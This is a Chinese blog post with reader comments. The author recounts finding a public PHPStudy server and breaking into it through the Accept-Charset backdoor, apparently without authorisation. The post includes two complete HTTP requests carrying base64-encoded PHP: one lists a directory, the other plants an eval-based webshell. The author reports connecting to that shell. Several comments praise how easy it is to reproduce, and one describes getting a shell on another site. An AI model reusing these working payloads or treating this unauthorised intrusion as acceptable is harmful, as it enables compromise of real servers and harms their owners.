记一次PHPstudy漏洞挖掘过程

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试1810,7252字数 184阅读0分36秒阅读模式
AI智能摘要
当你以为PHPStudy环境安全无虞时,一个看似普通的phpinfo页面竟能成为入侵入口。本文将完整还原黑客如何利用编码参数漏洞,在目标服务器上实现目录遍历与Webshell植入的全过程。通过真实攻击案例演示,揭示老旧PHP版本中隐藏的致命风险,并附详细payload解析——这或许是你的服务器正在面临的隐形威胁。
— AI 生成的文章内容摘要

今天有点烦躁,所以得找点事刺激一下

于是,公网上搜了一个PHPstudy的站
记一次PHPstudy漏洞挖掘过程-图片1
测试payload看看有没有漏洞,果然、存在漏洞
记一次PHPstudy漏洞挖掘过程-图片1
看一下目录

GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZWNobyBzeXN0ZW0oImRpciBEOlxwaHBTdHVkeVxXV1dcICIpOw== Connection: close

记一次PHPstudy漏洞挖掘过程-图片2
写入webshell

GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZnB1dHMoZm9wZW4oJ0Q6XHBocFN0dWR5XFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFtraWxsXSk/PicpOw== Connection: close

记一次PHPstudy漏洞挖掘过程-图片3
再次查看一下目录,可以看到成功了
记一次PHPstudy漏洞挖掘过程-图片3
连接,OK,收工。。。
记一次PHPstudy漏洞挖掘过程-图片3

http://www.oniont.cn/index.php/archives/286.html

 
OnionT@KillBoy
评论  18  访客  18
    • 星河滚烫
      星河滚烫 0

      这payload看着有点眼熟,是那个Accept-Charset的漏洞吧?

      • 平衡天秤
        平衡天秤 0

        刚入坑的小白问下,这个漏洞影响phpstudy所有版本吗?🤔

        • 心梦旅人
          心梦旅人 0

          之前帮朋友处理过类似情况,也是被传了shell,折腾半天才清理干净。

          • 深夜食堂
            深夜食堂 0

            这个漏洞好像需要特定配置才会触发?

            • 暗黑魔王
              暗黑魔王 0

              代码里那个base64解码出来是执行dir命令吧,有点东西。

                • 伏羲
                  伏羲 0

                  @ 暗黑魔王 dir命令执行那块base64解出来确实是列目录,后面写shell也顺理成章。

                • 怀旧钟表匠
                  怀旧钟表匠 0

                  测试环境用phpstudy的确实不少,方便是方便但安全配置容易疏忽。

                  • 寂灭之誓
                    寂灭之誓 0

                    图片里是5.4.0版本,现在新版本还有这个问题不?

                    • 浮萍漂泊
                      浮萍漂泊 0

                      666,步骤挺清晰的,适合跟着复现一下。

                      • 光禄勋
                        光禄勋 0

                        这种老漏洞实战中还能碰到,说明很多站运维真不上心啊。

                        • 铁拳无敌
                          铁拳无敌 0

                          感觉过程描述可以再细点,比如怎么定位到那个站点的。

                            • VanishingEcho
                              VanishingEcho 0

                              @ 铁拳无敌 定位站点是不是用的fofa或者shodan啊?求个具体方法。

                            • Zero狐
                              Zero狐 0

                              这漏洞复现起来其实挺简单的,照着步骤走就行。

                              • 月下独行者
                                月下独行者 0

                                Accept-Charset那个老洞了,没想到现在还有人中招。

                                • 橡皮擦下的真相
                                  橡皮擦下的真相 0

                                  我上周刚扫到一个站也是这个漏洞,直接getshell了。

                                  • 安息使者
                                    安息使者 0

                                    新手问下,PHPstudy不是本地开发工具吗?怎么公网还能搜到?🤔

                                    • 幽魂歌者
                                      幽魂歌者 0

                                      老版本PHPstudy默认开远程访问,很多小白根本不知道关。

                                      • 混沌之眼
                                        混沌之眼 0

                                        5.4.0太老了,但架不住有人还在生产环境跑这个……无语。

                                      匿名

                                      发表评论

                                      匿名网友

                                      拖动滑块以完成验证